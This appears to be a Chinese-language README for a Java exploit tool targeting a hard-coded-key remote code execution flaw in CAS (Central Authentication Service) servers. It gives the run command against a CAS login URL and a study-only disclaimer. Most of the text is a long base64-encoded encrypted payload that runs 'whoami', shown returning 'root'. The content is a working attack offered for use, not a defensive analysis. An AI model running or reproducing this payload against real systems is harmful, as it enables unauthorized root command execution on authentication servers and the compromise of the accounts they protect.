/CAS_EXP

CAS 硬编码 远程代码执行漏洞

Primary LanguageJava

CAS 硬编码 远程代码执行漏洞

使用方式

java -jar cas-0.0.1-all.jar http://localhost:8080/cas-server/login

-----------------------cas检测工具---------------------------------

-----------本软件仅供学习交流,如作他用所承受的法律责任一概与作者无关---------

---------use: jar -jar cas-0.0.1-all.jar http://xxxx.xxxx-------

-------------------create by maobugs----------------------------

执行命令whoami...

payload is: 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 BcnkUX4PLBLWolJgD30=

执行结果是:root